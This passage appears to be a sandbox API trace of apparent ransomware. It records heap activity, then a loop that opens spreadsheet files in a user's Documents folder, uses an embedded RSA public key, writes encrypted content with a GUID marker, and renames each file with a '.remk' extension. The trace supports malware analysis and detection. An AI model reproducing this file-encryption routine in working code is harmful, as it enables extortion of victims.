Size=0xeb) returned 0x6a7330 [0233.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0233.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee478 [0233.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee418 [0233.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0233.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0233.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee430 [0233.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0233.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0233.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee400 [0233.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0233.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee490 [0233.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0233.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0233.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee460 [0233.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee448 [0233.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee4a8 [0233.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee448 | out: hHeap=0x630000) returned 1 [0233.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee448 [0233.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee460 | out: hHeap=0x630000) returned 1 [0233.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0233.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0233.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0233.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee418 | out: hHeap=0x630000) returned 1 [0233.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee418 [0233.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37b5b70 [0233.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee478 | out: hHeap=0x630000) returned 1 [0233.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0233.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4a8 | out: hHeap=0x630000) returned 1 [0233.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5d80 [0233.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0233.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0233.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0233.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee418 | out: hHeap=0x630000) returned 1 [0233.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5f98 [0233.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0233.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0233.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d80 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5f98 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee448 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee490 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee430 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee400 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3e8 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bb858 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0233.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0233.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.608] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0x519c, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0x519c, lpOverlapped=0x0) returned 1 [0233.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0233.652] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x51a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.652] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0233.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0233.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0233.653] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.653] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.653] CloseHandle (hObject=0x640) returned 1 [0233.654] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\-I-Xy5gtCCf2anzAp.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\-i-xy5gtccf2anzap.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\-I-Xy5gtCCf2anzAp.ods.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\-i-xy5gtccf2anzap.ods.remk")) returned 1 [0233.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b8 | out: hHeap=0x630000) returned 1 [0233.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.655] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a46c0 | out: hHeap=0x630000) returned 1 [0233.657] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6a05980, ftCreationTime.dwHighDateTime=0x1d5e36a, ftLastAccessTime.dwLowDateTime=0xe02a4a10, ftLastAccessTime.dwHighDateTime=0x1d5db42, ftLastWriteTime.dwLowDateTime=0xe02a4a10, ftLastWriteTime.dwHighDateTime=0x1d5db42, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eBkpfXutqqrq6h", cAlternateFileName="EBKPFX~1")) returned 1 [0233.657] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43ffbf90, ftCreationTime.dwHighDateTime=0x1d5e221, ftLastAccessTime.dwLowDateTime=0x9524bce0, ftLastAccessTime.dwHighDateTime=0x1d5e14a, ftLastWriteTime.dwLowDateTime=0x9524bce0, ftLastWriteTime.dwHighDateTime=0x1d5e14a, nFileSizeHigh=0x0, nFileSizeLow=0x13000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ffz SFjC.ots", cAlternateFileName="FFZSFJ~1.OTS")) returned 1 [0233.657] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\ffz SFjC.ots") returned=".ots" [0233.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\ffz SFjC.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ffz sfjc.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.658] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=77824) returned 1 [0233.658] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.661] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12fda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.661] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.663] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x13000, lpOverlapped=0x0) returned 1 [0233.667] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.667] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.667] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.667] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.668] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.668] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.668] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.668] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.668] GetLastError () returned 0x0 [0233.668] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.668] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.669] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.669] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.669] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.669] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.670] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x13000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.670] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0233.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0233.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0233.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0233.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.671] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.671] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.671] CloseHandle (hObject=0x640) returned 1 [0233.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e600 [0233.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0233.674] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\ffz SFjC.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ffz sfjc.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\ffz SFjC.ots.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ffz sfjc.ots.remk")) returned 1 [0233.677] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57debbe0, ftCreationTime.dwHighDateTime=0x1d5e0f2, ftLastAccessTime.dwLowDateTime=0xe5d73030, ftLastAccessTime.dwHighDateTime=0x1d5e7f0, ftLastWriteTime.dwLowDateTime=0xe5d73030, ftLastWriteTime.dwHighDateTime=0x1d5e7f0, nFileSizeHigh=0x0, nFileSizeLow=0x1298b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FHmONqV v2JkG3.ots", cAlternateFileName="FHMONQ~1.OTS")) returned 1 [0233.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a46c0 [0233.677] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\FHmONqV v2JkG3.ots") returned=".ots" [0233.677] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\FHmONqV v2JkG3.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\fhmonqv v2jkg3.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.677] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=76171) returned 1 [0233.677] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.680] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12965, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.680] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.684] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x1298b, lpOverlapped=0x0) returned 1 [0233.684] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.684] lstrlenA (lpString="-----BEGIN PUBLIC 